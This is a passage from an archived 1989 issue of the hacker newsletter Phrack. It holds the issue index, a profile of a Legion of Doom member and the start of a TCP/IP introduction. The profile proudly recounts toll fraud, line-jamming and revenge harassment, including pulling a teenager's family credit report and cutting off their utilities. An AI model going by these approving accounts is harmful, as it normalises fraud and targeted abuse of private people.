home *** CD-ROM | disk | FTP | other *** search
/ Phoenix Rising BBS / phoenixrising.zip / phoenixrising / phrack / phrack28.arj / PHRACK28.PHK
Text File  |  1990-12-05  |  188KB  |  3,958 lines

  1. cat Phrack_#28
  2.  
  3.                                 ==Phrack Inc.==
  4.  
  5.                      Volume Three, Issue 28, File #1 of 12
  6.  
  7.                    Phrack Inc. Newsletter Issue XXVIII Index
  8.                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9.                                 October 7, 1989
  10.  
  11.  
  12.      Greetings and welcome to Issue 28 of Phrack Inc.  We really
  13. must apologize for the lateness of this issue, but sorting
  14. through all of the files sent in from over the entire summer as
  15. well as our own real life responsibilities have been keeping us
  16. both rather busy.
  17.  
  18.      This issue we feature Phrack World News Special Edition III.
  19. This file contains the exclusive coverage of SummerCon '89, which
  20. took place in St. Louis, Missouri on June 22-25, 1989.
  21.  
  22.      The Future Transcendent Saga continues in this issue with
  23. part one of a file about TCP/IP.  We also present to you the
  24. beginning of a new irregular column called Network Miscellany by
  25. Taran King.  Its exactly what it says it is -- interesting and
  26. important changes in, and tips about using, the Internet.  It
  27. will contain different material each issue it is presented in to
  28. keep pace with the always changing wide area networks.  Speaking
  29. of irregular columns, Phrack Pro-Phile returns this issue with a
  30. detailed look at Erik Bloodaxe of LOD.
  31.  
  32.      As always, we ask that anyone with network access drop us a
  33. line to either our Bitnet or Internet addresses...
  34.  
  35.                Taran King                        Knight Lightning
  36.           C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
  37.        C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
  38.  
  39. And now we can also be reached via our new mail forwarding
  40. addresses (for those that cannot mail to our Bitnet or Internet
  41. addresses):
  42.  
  43.                ...!netsys!phrack      or      phrack@netsys.COM
  44. _______________________________________________________________________________
  45.  
  46. Table of Contents:
  47.  
  48. 1.  Phrack Inc. XXVIII Index by Taran King and Knight Lightning
  49. 2.  Phrack Pro-Phile XXVIII on Erik Bloodaxe by Taran King
  50. 3.  Introduction to the Internet Protocols:  Chapter Eight of the FTS by KL
  51. 4.  Network Miscellany by Taran King
  52. 5.  A Real Functioning PEARL BOX Schematic by Dispater
  53. 6.  Snarfing Remote Files by Dark OverLord
  54. 7.  Other Common Carriers; A List By Equal Axis
  55. 8.  Phrack World News Special Edition III (SummerCon '89) by Knight Lightning
  56. 9-12 Phrack World News XXVIII/Parts 1-4 by Knight Lightning
  57. _______________________________________________________________
  58.  
  59.                                 ==Phrack Inc.==
  60.  
  61.                      Volume Three, Issue 28, File #2 of 12
  62.  
  63.                           ==Phrack Pro-Phile XXVIII==
  64.  
  65.                        Created and Written by Taran King
  66.  
  67.                           Done on September 23, 1989
  68.  
  69.          Welcome to Phrack Pro-Phile XXVIII.  Phrack Pro-Phile
  70. was created to bring information to you, the community, about
  71. retired or highly important/ controversial people.  This issue,
  72. we bring you a long time member of the hacking community and a
  73. charter member of the Legion Of Doom...
  74.  
  75.                                  Erik Bloodaxe
  76.                                  ~~~~~~~~~~~~~
  77.        Handle:  Erik Bloodaxe
  78.      Call Him:  Chris
  79. Handle Origin:  "Vikings" by ? (Don't remember)
  80. Date Of Birth:  20 years ago
  81.   Current Age:  20
  82.        Height:  5' 10"
  83.        Weight:  130
  84.     Eye Color:  Blue
  85.    Hair Color:  Brown
  86.    Blood Type:  A+
  87.   Sperm Count:  3
  88.     Computers:  Atari 400, various dumb terminals, CompuAdd Turbo XT
  89.  
  90. Origins in Phreak/Hack World
  91. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  92. Way back when he was in 7th grade, some 8+ years back, Erik was
  93. quite a shoplifter.  As was the norm for 13 year-olds, he and a
  94. friend of his had stolen a stack of "girlie" magazines on one of
  95. their "raids."  One of these was High Society, which was toying
  96. with the idea of "recorded entertainment."  His friend was
  97. determined to hear this, but as the number was in New York, they
  98. decided to use the "strange phone service" his mother had signed
  99. up for to keep down the bill.  He explained it to Erik, "You dial
  100. this number and then tell the operator your number and the phone
  101. number."  They called it and told the operator a number that was
  102. 100 off by mistake.  The operator said "Thank you," and the call
  103. went through.  Thus was born a "code-abuser."  They kept this
  104. information to themselves for several months.  When the service
  105. changed to an automated format (rather than operator service),
  106. they began to share their knowledge.  Word spread like wildfire.
  107. Interestingly enough, to this day, he can still backtrack 95% of
  108. all hacker-related code abuse from San Antonio back to himself as
  109. the originator of the information (well, a friend of a friend of
  110. a friend, etc..)
  111.  
  112. Origins in Phreak/Hack BBSes
  113. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  114. A friend of Bloodaxe's father bought a MicroModem II to get
  115. information from Dialog for his legal practice.  He still
  116. remembers the first time he used it.  His friend's dad used
  117. Dialog through Telenet.  Once he saw Telenet, he began trying
  118. various addresses.  One of the first things he ever did was get
  119. into a 212 VAX/VMS with GUEST/GUEST.  Erik had absolutely no idea
  120. what he was doing.  They were just guessing... typing things like
  121. "hello?", "catalog", and assorted other inane things.  They also
  122. called a few BBSes that came with the modem instructions (using
  123. their long-distance trick).  By the end of the weekend, they had
  124. worked their way to Pirates' Harbor (now TIMECOR) in 617, and
  125. Pirates' Cove 516.  From then on, he was hooked on modems.  Then,
  126. Wargames came out.  Embarrassing as it is for Erik, Wargames
  127. really did play a part in imbedding the idea of computer
  128. "hacking" in his little head.  (As it did for hundreds of others
  129. who are too insecure to admit it.)  He had his little Atari 400,
  130. but no modem (Hayes 300's were still hundreds of dollars).
  131. Another friend got an Atari Acoustic Coupler for his 800.  Born
  132. now were the Atari Warez D00dz.  For about a year, they did
  133. nothing but call Atari BBSes (and anything that had "Pirate" in
  134. its name).  They did stumble onto things like the Phone Booth in
  135. 303, OSUNY (on an OHIO Scientific, days before it went down), and
  136. Mines of Moria (713).  Finally, he got an MPP modem.  Bloodaxe
  137. was on it day and night.  By this time they got into scanning.
  138. He was the one who checked everything out, as he was the one who
  139. was reading up on computer OSes at the UTSA library.  They were
  140. still big into games, and they ran across a really new game
  141. called Behind Jaggi Lines.  A guy named Devious Xevious traded
  142. them something called Software Blue Box for it, and gave them a
  143. BBS to call:  Pirate-80.  In 1983, Erik Bloodaxe entered the
  144. hack/phreak world.  He was blue boxing most of his calls by then.
  145.  
  146.  
  147. People in the Phreak/Hack World Met
  148. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  149. Bloodaxe has only met a handful "face-to-face," but has spoken
  150. with almost everyone around in the "golden-years," as he was
  151. heavily into conferences.
  152.  
  153.  
  154. Experience Gained In the Following Ways
  155. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  156. Mainly trial and error.  He would find a system, try to get in
  157. with simplistic username/password pairs, and then read help.  He
  158. also reads a lot.  He didn't speak out until he was sure of what
  159. he was talking about.  Erik never asked any questions, but always
  160. listened.  During the time he was a true "novice," he kept it
  161. fairly hidden, because he didn't want to seem stupid.
  162.  
  163. Chris attributes the knowledge he has gained to himself.
  164.  
  165.  
  166. Memorable Phreak/Hack BBSes
  167. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  168. Pirate-80  (He still call to check in on Scott)
  169. Sherwood Forest I, II, III
  170. RACS III (Tuc wouldn't let him on until years after he first called!!)
  171. Plovernet (Before and after the move)
  172. COPS (Where he got mail from Lex telling him to call Legion of Doom)
  173. WOPR (Getting closer to what BBSes would become)
  174. Hacknet (217)
  175. Legion of Doom (The ultimate in BBSes at the time)
  176. Crystal Palace (OSUNY lives again!)
  177. Newsnet (Yes, Sir Knight's BBS)
  178. Blottoland (Lair of the rodents)
  179. Ripco (A looooooong time ago, certainly not now)
  180. The Broadway Show ("Well, Mike was a little off, but so what.")
  181. Farmers of Doom! (Run from a pay phone, complete chaos)
  182. The Connection (A good private BBS)
  183. Catch-22 (A "better" private BBS)
  184. The Pipeline (718)
  185. Freeworld II
  186. Executive Inn (Re-instilled his faith in BBSes)
  187. The Phoenix Project (What he would want his BBS to equal or
  188. surpass in quality)
  189. Black Ice (A big leak; ask anyone at the Ameritech security
  190. convention)
  191. Pure Nihilism (Too much fun!)
  192.  
  193.  
  194. Schooling/Work
  195. ~~~~~~~~~~~~~~
  196. Chris is currently struggling as a Computer Science major at
  197. University of Texas in Austin with intentions of a PhD,
  198. specializing in AI research.
  199.  
  200.  
  201. Accomplishments
  202. ~~~~~~~~~~~~~~~
  203. Project Educate:  Was supposed to replace TAP after Tuc got fed
  204.                   up.  No one really knows what happened to it.
  205.  
  206. LOD/H TJ:         Assorted work, major distributor.
  207.  
  208. Numerous files.
  209.  
  210.  
  211. Phreak/Hack Groups
  212. ~~~~~~~~~~~~~~~~~~
  213. LOD - In the original recruitment group, still in, still active.
  214.       What more can be said?  "LOD!" basically sums it all up.
  215.  
  216. Camorra - Erik still gets mad about this.  He was asked by the
  217.           602 Scorpion to join a group that was being formed.  He
  218.           agreed, and he then came up with Camorra as a name.
  219.           The other members were Ax Murderer and 301 Executioner.
  220.           He got Dr. Who, Silver Sabre, and Pit Fiend to join and
  221.           Karl Marx, Tuc, and Videosmith were kind of
  222.           in/out-not-really-into-groups-but-we'll-hang-out kind
  223.           of members.  Most of them were deep into their
  224.           phones/computers.  They were planning a series of
  225.           files, such as the first Tymnet directory, a great
  226.           COSMOS file, a database of scans, etc.  Suddenly people
  227.           began appearing in the group that no one voted on.  The
  228.           group kind of split up into two factions, "us and
  229.           them."  Bloodaxe and Dr. Who just got mad and blew it
  230.           all off.  Pit Fiend got busted, and the Scorpion
  231.           disappeared.
  232.  
  233.  
  234. Interests
  235. ~~~~~~~~~
  236. Packet networks (all), telco computers, Unixes, scanning (every night for
  237. almost 5 years!)
  238.  
  239.  
  240. Favorite Things
  241. ~~~~~~~~~~~~~~~
  242. Beer--Tsing Tao, Michelob Dry, Coors Light.  (He am in college, you know!)
  243. Ecstasy--Grinding away (His teeth and his mind).
  244. Getting into a system on the first try.
  245. Unprotected crontab files.
  246. Scanning.  Anything, for anything, just doing it!
  247. A certain shapely 5'2" blonde who shall remain nameless.
  248.  
  249.  
  250. Most Memorable Experiences
  251. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  252. Alliance Teleconferencing way back when.  Tandem scanning out
  253. other sites in Houston and Dallas.  Transferring control to
  254. directory assistance ACD loops, and leaving it there until he
  255. wanted to run one.  Waking up the next morning and yelling into
  256. the phone at everyone else who had stayed on the conference and
  257. starting to talk again.  Conferences that lasted a week.
  258. Catching Draper in lies.  Busying out all the 408 DA's.  Boxing
  259. on a conference and trunking Karl Marx.  Calling random numbers
  260. in California and adding them in if they sounded like teenage
  261. girls.  "Giving" people unlimited trial usage of a "new" long
  262. distance service (LOD Telecommunications).  Jennifer, the
  263. Alliance operator who had it out for him ("This is that
  264. Bloody-axe person isn't it?").
  265.  
  266. The Wharton School of Business Dec-10.  For nearly a month all
  267. the nation's top phreaks and hackers hung out on this system and
  268. used the chat program.  It was "the" place to be (kind of like an
  269. Altger Altos of the past, but no idiots).  Finally they killed
  270. the account, not because of abuse, but because they were loading
  271. the system down.  The students and operators were really cool
  272. about the whole thing.
  273.  
  274. Finding (and spreading around everywhere) the White House Signal
  275. number.  A number of my friends kept calling it, posing as the
  276. mayor of San Antonio, Henry Cisneros, eventually causing the
  277. Secret Service call our high school, and telling the
  278. administrators to grab the people using the payphone to find out
  279. what the hell they were trying to do.
  280.  
  281. Taking down almost every BBS in Alaska when he was denied access
  282. to one.  He pulled the poor kid's parents credit report, sent a
  283. copy to the kid over his modem, and disconnected the kid's phone,
  284. electricity, and water.  He then went around taking down the
  285. BBSes where the kid had friends (guilt by association).  Word got
  286. around the nation kind of fast.  Erik got on most BBSes without
  287. much trouble after all that.  He had a project to be on at least
  288. one BBS in every area code.  Bloodaxe had to get on
  289. non-hack/pirate ones in a few areas, but he managed to do it.  He
  290. stayed active on all of them for several months.  At one time, he
  291. was on about 140 BBSes!!!
  292.  
  293. Reading a new edition of Newsweek with a story by Richard Sandza
  294. in it over a very crowded conference, then suggesting that he
  295. should get some Slim Whitman albums and Civil War Chess Sets via
  296. his Visa.  Erik pulled his history, to scare him, but lost it.
  297. When he pulled it later, there were nearly 100 inquiries, most by
  298. a certain Massachusetts Bank.  At least they gave him a good
  299. source for a follow-up article.
  300.  
  301. Finding out that a certain long distance service (reselling AT&T
  302. WATS) would reset to a WATS dialtone when 2600 was blasted and
  303. then setting up a program to call MTV's 900 number repeatedly to
  304. ensure that Duran Duran would get severely beaten.
  305.  
  306. Bloodaxe remembers boxing up a conference while waiting for the
  307. police to come, and fighting the impulse to run away.  He had
  308. tickets carded to Philadelphia International on a flight that
  309. afternoon (on the conference), and Telenet Bob was ready to meet
  310. Erik's flight, Mark Tabas was ready to send him a blank birth
  311. certificate, not to mention offers to stay with Dr. Who or
  312. Telenet Bob for as long as he needed to get settled.  Karl Marx
  313. talked him out of it though.  He was packed and ready to leave
  314. and become a new person in a new city.  Looking back, he's DAMN
  315. glad he didn't do it!
  316.  
  317. Bloodaxe and Who-Bob deciding one fateful day to see if they
  318. could talk to each other's port on Telenet using an ID they had
  319. used for the LOD Telenet directory.
  320.  
  321.  
  322. Some People to Mention
  323. ~~~~~~~~~~~~~~~~~~~~~~
  324. Dr. Who -- "My closest hacker counterpart.  We joke about being
  325.            60 with grandchildren, still having never met, calling
  326.            each other daily, with stories about how we just
  327.            defeated some ISDN service."
  328.  
  329. The Mentor -- "My favorite drinking buddy.  The first hacker I
  330.               ever met face-to-face."
  331.  
  332. Control C -- "One person who can almost equal me in outrageous
  333.               behavior.  Yes, Dan, I said almost!  Nyahh Nyahh!"
  334.  
  335.  
  336. Inside Jokes
  337. ~~~~~~~~~~~~
  338. Lame, Lame, Lame
  339.  
  340. LEGION OF DOOM IN DALLAS...FEDS BAFFLED
  341.  
  342.  
  343. Serious Section
  344. ~~~~~~~~~~~~~~~
  345. Chris makes it a point to make huge filibusters on boards where
  346. he sees anything having even anything remotely related to
  347. carding.  Credit card fraud truly gives hacking a bad name.
  348. Snooping around a VAX is just electronic voyeurism... carding a
  349. new modem is just flat out blue-collar crime.  It's just as bad
  350. as breaking into a house or kicking a puppy!  He does everything
  351. he can (even up to turning off a number) to get credit
  352. information taken off a BBS.  He also tries to remove codes from
  353. BBSes.  He doesn't see code abuse in the same light as credit
  354. card fraud, (although the law does), but posted codes are the
  355. quickest way to get your board busted, and your computer
  356. confiscated.  People should just find a local outdial to wherever
  357. they want to call and use that.  If you only make local calls
  358. from an outdial, it will never die, you will keep out of trouble,
  359. and everyone will be happy.
  360.  
  361. Marijuana, cocaine, LSD, MDMA (& analogs), and methamphetamine
  362. should be legalized and sold in a controlled fashion, regulated
  363. by the government.  Money spent currently on combatting drug
  364. traffic should be spent on the deficit, and on drug education and
  365. rehabilitation.  Making petty vices illegal only breeds crime;
  366. look at prohibition, look at gambling, look at how fast people go
  367. on the highway.  You cannot fight a losing battle, and therefore,
  368. must take on a new strategy.  Alcohol is the only drug he has
  369. ever imbibed and lost all consciousness and complete control of
  370. his actions.  He thinks it is THE most dangerous drug around, and
  371. anyone can get as much of it as they want with very little
  372. effort.  It is legal, but not everyone drinks.  If marijuana was
  373. legal not everyone would smoke it.  He wouldn't for one; he hates
  374. it.  However, farmers would no longer lose their farms; and most
  375. importantly, the economy would be boosted greatly.  Things have
  376. got to change.
  377.  
  378.  
  379. Are Phreaks/Hackers You've Met Generally Computer Geeks?
  380. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  381. Of course not.  There are some that are, but generally there is
  382. an average sampling of the general population.  Hacking is just
  383. another hobby.  Most people who collect comic books are not all
  384. the same, most people who play backgammon are not similar in
  385. physical characteristics either.  The closest stereotype he could
  386. ever even say existed was 6 or so years ago, and that would be
  387. that most hackers then were Jewish and from New York state.  An
  388. obnoxious Texan WASP like Chris really stood out.
  389.  
  390.  
  391. Thanks for your time, Chris.
  392.  
  393.                                                    Taran King
  394. ________________________________________________________________
  395.  
  396.                                 ==Phrack Inc.==
  397.  
  398.                      Volume Three, Issue 28, File #3 of 12
  399.  
  400.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  401.        <>                                                            <>
  402.        <>           Introduction to the Internet Protocols           <>
  403.        <>           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~           <>
  404.        <>        Chapter Eight Of The Future Transcendent Saga       <>
  405.        <>                                                            <>
  406.        <>                    Part One of Two Files                   <>
  407.        <>                                                            <>
  408.        <>                Presented by Knight Lightning               <>
  409.        <>                        July 3, 1989                        <>
  410.        <>                                                            <>
  411.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  412.  
  413.  
  414. Prologue
  415. ~~~~~~~~
  416. Much of the material in this file comes from "Introduction to the
  417. Internet Protocols" by Charles L. Hedrick of Rutgers University.
  418. That material is copyrighted and is used in this file by
  419. permission.  Time differention and changes in the wide area
  420. networks have made it necessary for some details of the file to
  421. updated and in some cases reworded for better understanding of
  422. our readers.  Also, Unix is a trademark of AT&T Technologies,
  423. Inc. -- Just thought I'd let you know.
  424.  
  425. If you are not already familiar with TCP/IP, I would suggest that
  426. you read "Introduction to MIDNET" (Phrack Inc., Volume Three,
  427. Issue 27, File 3 of 12) for more information.  That file is
  428. Chapter Seven of The Future Transcendent Saga and contains
  429. information about TCP/IP and how it is used within the National
  430. Science Foundation Network (NSFnet).
  431.  
  432.  
  433. Table of Contents - Part One
  434. ~~~~~~~~~~~~~~~~~
  435. *  Introduction
  436. *  What Is TCP/IP?
  437. *  General Description Of The TCP/IP Protocols
  438.        The TCP Level
  439.        The IP Level
  440.        The Ethernet Level
  441.  
  442.  
  443. Introduction
  444. ~~~~~~~~~~~~
  445. This article is a brief introduction to TCP/IP, followed by
  446. suggestions on what to read for more information.  This is not
  447. intended to be a complete description, but it can give you a
  448. reasonable idea of the capabilities of the protocols.  However,
  449. if you need to know any details of the technology, you will want
  450. to read the standards yourself.
  451.  
  452. Throughout the article, you will find references to the
  453. standards, in the form of "RFC" (Request For Comments) or "IEN"
  454. (Internet Engineering Notes) numbers -- these are document
  455. numbers.  The final section (in Part Two) explains how you can
  456. get copies of those standards.
  457.  
  458.  
  459. What Is TCP/IP?
  460. ~~~~~~~~~~~~~~~
  461. TCP/IP is a set of protocols developed to allow cooperating
  462. computers to share resources across a network.  It was developed
  463. by a community of researchers centered around the ARPAnet.
  464.  
  465. First some basic definitions; The most accurate name for the set
  466. of protocols I am describing is the "Internet protocol suite."
  467. TCP and IP are two of the protocols in this suite (they will be
  468. described below).  Because TCP and IP are the best known of the
  469. protocols, it has become common to use the term TCP/IP to refer
  470. to the whole family.
  471.  
  472. The Internet is a collection of networks, including the Arpanet,
  473. NSFnet, regional networks such as MIDnet (described in Chapter
  474. Seven of the Future Transcendent Saga), local networks at a
  475. number of University and research institutions, and a number of
  476. military networks.  The term "Internet" applies to this entire
  477. set of networks.
  478.  
  479. The subset of them that is managed by the Department of Defense
  480. is referred to as the "DDN" (Defense Data Network).  This
  481. includes some research-oriented networks, such as the ARPAnet, as
  482. well as more strictly military ones (because much of the funding
  483. for Internet protocol developments is done via the DDN
  484. organization, the terms Internet and DDN can sometimes seem
  485. equivalent).
  486.  
  487. All of these networks are connected to each other.  Users can
  488. send messages from any of them to any other, except where there
  489. are security or other policy restrictions on access.  Officially
  490. speaking, the Internet protocol documents are simply standards
  491. adopted by the Internet community for its own use.  The
  492. Department of Defense once issued a MILSPEC definition of TCP/IP
  493. that was intended to be a more formal definition, appropriate for
  494. use in purchasing specifications.  However most of the TCP/IP
  495. community continues to use the Internet standards.  The MILSPEC
  496. version is intended to be consistent with it.
  497.  
  498. Whatever it is called, TCP/IP is a family of protocols.  A few
  499. provide "low-level" functions needed for many applications.
  500. These include IP, TCP, and UDP (all of which will be described in
  501. a bit more detail later in this file).  Others are protocols for
  502. doing specific tasks, e.g. transferring files between computers,
  503. sending mail, or finding out who is logged in on another
  504. computer.
  505.  
  506. Initially TCP/IP was used mostly between minicomputers or
  507. mainframes.  These machines had their own disks, and generally
  508. were self-contained.  Thus the most important "traditional"
  509. TCP/IP services are:
  510.  
  511.     - File Transfer -- The file transfer protocol (FTP) allows a
  512.       user on any computer to get files from another computer, or
  513.       to send files to another computer.  Security is handled by
  514.       requiring the user to specify a user name and password for
  515.       the other computer.
  516.  
  517.       Provisions are made for handling file transfer between
  518.       machines with different character set, end of line
  519.       conventions, etc.  This is not quite the same as "network
  520.       file system" or "netbios" protocols, which will be
  521.       described later.  Instead, FTP is a utility that you run
  522.       any time you want to access a file on another system.  You
  523.       use it to copy the file to your own system.  You then can
  524.       work with the local copy.  (See RFC 959 for specifications
  525.       for FTP.)
  526.  
  527.     - Remote Login -- The network terminal protocol (TELNET)
  528.       allows a user to log in on any other computer on the
  529.       network.  You start a remote session by specifying a
  530.       computer to connect to.  From that time until you finish
  531.       the session, anything you type is sent to the other
  532.       computer.  Note that you are really still talking to your
  533.       own computer, but the telnet program effectively makes your
  534.       computer invisible while it is running.  Every character
  535.       you type is sent directly to the other system.  Generally,
  536.       the connection to the remote computer behaves much like a
  537.       dialup connection.  That is, the remote system will ask you
  538.       to log in and give a password, in whatever manner it would
  539.       normally ask a user who had just dialed it up.
  540.  
  541.       When you log off of the other computer, the telnet program
  542.       exits, and you will find yourself talking to your own
  543.       computer.  Microcomputer implementations of telnet
  544.       generally include a terminal emulator for some common type
  545.       of terminal.  (See RFCs 854 and 855 for specifications for
  546.       telnet.  By the way, the telnet protocol should not be
  547.       confused with Telenet, a vendor of commercial network
  548.       services.)
  549.  
  550.     - Computer Mail -- This allows you to send messages to users
  551.       on other computers.  Originally, people tended to use only
  552.       one or two specific computers and they would maintain "mail
  553.       files" on those machines.  The computer mail system is
  554.       simply a way for you to add a message to another user's
  555.       mail file.  There are some problems with this in an
  556.       environment where microcomputers are used.
  557.  
  558.       The most serious is that a micro is not well suited to
  559.       receive computer mail.  When you send mail, the mail
  560.       software expects to be able to open a connection to the
  561.       addressee's computer, in order to send the mail.  If this
  562.       is a microcomputer, it may be turned off, or it may be
  563.       running an application other than the mail system.  For
  564.       this reason, mail is normally handled by a larger system,
  565.       where it is practical to have a mail server running all the
  566.       time.  Microcomputer mail software then becomes a user
  567.       interface that retrieves mail from the mail server.  (See
  568.       RFC 821 and 822 for specifications for computer mail.  See
  569.       RFC 937 for a protocol designed for microcomputers to use
  570.       in reading mail from a mail server.)
  571.  
  572. These services should be present in any implementation of TCP/IP,
  573. except that micro-oriented implementations may not support
  574. computer mail.  These traditional applications still play a very
  575. important role in TCP/IP-based networks.  However more recently,
  576. the way in which networks are used has been changing.  The older
  577. model of a number of large, self-sufficient computers is
  578. beginning to change.  Now many installations have several kinds
  579. of computers, including microcomputers, workstations,
  580. minicomputers, and mainframes.  These computers are likely to be
  581. configured to perform specialized tasks.  Although people are
  582. still likely to work with one specific computer, that computer
  583. will call on other systems on the net for specialized services.
  584. This has led to the "server/client" model of network services.  A
  585. server is a system that provides a specific service for the rest
  586. of the network.  A client is another system that uses that
  587. service.  Note that the server and client need not be on
  588. different computers.  They could be different programs running on
  589. the same computer.  Here are the kinds of servers typically
  590. present in a modern computer setup.  Also note that these
  591. computer services can all be provided within the framework of
  592. TCP/IP.
  593.  
  594. -  Network file systems.  This allows a system to access files on
  595.    another computer in a somewhat more closely integrated fashion
  596.    than FTP.  A network file system provides the illusion that
  597.    disks or other devices from one system are directly connected
  598.    to other systems.  There is no need to use a special network
  599.    utility to access a file on another system.  Your computer
  600.    simply thinks it has some extra disk drives.  These extra
  601.    "virtual" drives refer to the other system's disks.  This
  602.    capability is useful for several different purposes.  It lets
  603.    you put large disks on a few computers, but still give others
  604.    access to the disk space.  Aside from the obvious economic
  605.    benefits, this allows people working on several computers to
  606.    share common files.  It makes system maintenance and backup
  607.    easier, because you don't have to worry about updating and
  608.    backing up copies on lots of different machines.  A number of
  609.    vendors now offer high-performance diskless computers.  These
  610.    computers have no disk drives at all.  They are entirely
  611.    dependent upon disks attached to common "file servers".  (See
  612.    RFC's 1001 and 1002 for a description of PC-oriented NetBIOS
  613.    over TCP.  In the workstation and minicomputer area, Sun's
  614.    Network File System is more likely to be used.  Protocol
  615.    specifications for it are available from Sun Microsystems.) -
  616.    remote printing.  This allows you to access printers on other
  617.    computers as if they were directly attached to yours.  (The
  618.    most commonly used protocol is the remote lineprinter protocol
  619.    from Berkeley Unix.  Unfortunately, there is no protocol
  620.    document for this.  However the C code is easily obtained from
  621.    Berkeley, so implementations are common.)
  622.  
  623. -  Remote execution.  This allows you to request that a
  624.    particular program be run on a different computer.  This is
  625.    useful when you can do most of your work on a small computer,
  626.    but a few tasks require the resources of a larger system.
  627.    There are a number of different kinds of remote execution.
  628.    Some operate on a command by command basis.  That is, you
  629.    request that a specific command or set of commands should run
  630.    on some specific computer.  (More sophisticated versions will
  631.    choose a system that happens to be free.) However there are
  632.    also "remote procedure call" systems that allow a program to
  633.    call a subroutine that will run on another computer.  (There
  634.    are many protocols of this sort.  Berkeley Unix contains two
  635.    servers to execute commands remotely:  rsh and rexec.  The
  636.    Unix "man" pages describe the protocols that they use.  The
  637.    user-contributed software with Berkeley 4.3 contains a
  638.    "distributed shell" that will distribute tasks among a set of
  639.    systems, depending upon load.
  640.  
  641. -  Name servers.  In large installations, there are a number of
  642.    different collections of names that have to be managed.  This
  643.    includes users and their passwords, names and network
  644.    addresses for computers, and accounts.  It becomes very
  645.    tedious to keep this data up to date on all of the computers.
  646.    Thus the databases are kept on a small number of systems.
  647.    Other systems access the data over the network.  (RFC 822 and
  648.    823 describe the name server protocol used to keep track of
  649.    host names and Internet addresses on the Internet.  This is
  650.    now a required part of any TCP/IP implementation.  IEN 116
  651.    describes an older name server protocol that is used by a few
  652.    terminal servers and other products to look up host names.
  653.    Sun's Yellow Pages system is designed as a general mechanism
  654.    to handle user names, file sharing groups, and other databases
  655.    commonly used by Unix systems.  It is widely available
  656.    commercially.  Its protocol definition is available from Sun.)
  657.  
  658. -  Terminal servers.  Many installations no longer connect
  659.    terminals directly to computers.  Instead they connect them to
  660.    terminal servers.  A terminal server is simply a small
  661.    computer that only knows how to run telnet (or some other
  662.    protocol to do remote login).  If your terminal is connected
  663.    to one of these, you simply type the name of a computer, and
  664.    you are connected to it.  Generally it is possible to have
  665.    active connections to more than one computer at the same time.
  666.    The terminal server will have provisions to switch between
  667.    connections rapidly, and to notify you when output is waiting
  668.    for another connection.  (Terminal servers use the telnet
  669.    protocol, already mentioned.  However any real terminal server
  670.    will also have to support name service and a number of other
  671.    protocols.)
  672.  
  673. -  Network-oriented window systems.  Until recently,
  674.    high-performance graphics programs had to execute on a
  675.    computer that had a bit-mapped graphics screen directly
  676.    attached to it.  Network window systems allow a program to use
  677.    a display on a different computer.  Full-scale network window
  678.    systems provide an interface that lets you distribute jobs to
  679.    the systems that are best suited to handle them, but still
  680.    give you a single graphically-based user interface.  (The most
  681.    widely-implemented window system is X.  A protocol description
  682.    is available from MIT's Project Athena.  A reference
  683.    implementation is publically available from MIT.  A number of
  684.    vendors are also supporting NeWS, a window system defined by
  685.    Sun.  Both of these systems are designed to use TCP/IP.)
  686.  
  687. Note that some of the protocols described above were designed by
  688. Berkeley, Sun, or other organizations.  Thus they are not
  689. officially part of the Internet protocol suite.  However they are
  690. implemented using TCP/IP, just as normal TCP/IP application
  691. protocols are.  Since the protocol definitions are not considered
  692. proprietary, and since commercially-supported implementations are
  693. widely available, it is reasonable to think of these protocols as
  694. being effectively part of the Internet suite.
  695.  
  696. Note that the list above is simply a sample of the sort of
  697. services available through TCP/IP.  However it does contain the
  698. majority of the "major" applications.  The other commonly-used
  699. protocols tend to be specialized facilities for getting
  700. information of various kinds, such as who is logged in, the time
  701. of day, etc.  However if you need a facility that is not listed
  702. here, I encourage you to look through the current edition of
  703. Internet Protocols (currently RFC 1011), which lists all of the
  704. available protocols, and also to look at some of the major TCP/IP
  705. implementations to see what various vendors have added.
  706.  
  707.  
  708. General Description Of The TCP/IP Protocols
  709. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  710. TCP/IP is a layered set of protocols.  In order to understand
  711. what this means, it is useful to look at an example.  A typical
  712. situation is sending mail.  First, there is a protocol for mail.
  713. This defines a set of commands which one machine sends to
  714. another, e.g. commands to specify who the sender of the message
  715. is, who it is being sent to, and then the text of the message.
  716. However this protocol assumes that there is a way to communicate
  717. reliably between the two computers.  Mail, like other application
  718. protocols, simply defines a set of commands and messages to be
  719. sent.  It is designed to be used together with TCP and IP.
  720.  
  721. TCP is responsible for making sure that the commands get through
  722. to the other end.  It keeps track of what is sent, and
  723. retransmitts anything that did not get through.  If any message
  724. is too large for one datagram, e.g. the text of the mail, TCP
  725. will split it up into several datagrams, and make sure that they
  726. all arrive correctly.  Since these functions are needed for many
  727. applications, they are put together into a separate protocol,
  728. rather than being part of the specifications for sending mail.
  729. You can think of TCP as forming a library of routines that
  730. applications can use when they need reliable network
  731. communications with another computer.
  732.  
  733. Similarly, TCP calls on the services of IP.  Although the
  734. services that TCP supplies are needed by many applications, there
  735. are still some kinds of applications that don't need them.
  736. However there are some services that every application needs.  So
  737. these services are put together into IP.  As with TCP, you can
  738. think of IP as a library of routines that TCP calls on, but which
  739. is also available to applications that don't use TCP.  This
  740. strategy of building several levels of protocol is called
  741. "layering."  I like to think of the applications programs such as
  742. mail, TCP, and IP, as being separate "layers," each of which
  743. calls on the services of the layer below it.  Generally, TCP/IP
  744. applications use 4 layers:
  745.  
  746. - An application protocol such as mail.
  747.  
  748. - A protocol such as TCP that provides services need by many
  749. applications.
  750.  
  751. - IP, which provides the basic service of getting datagrams to
  752.   their destination.
  753.  
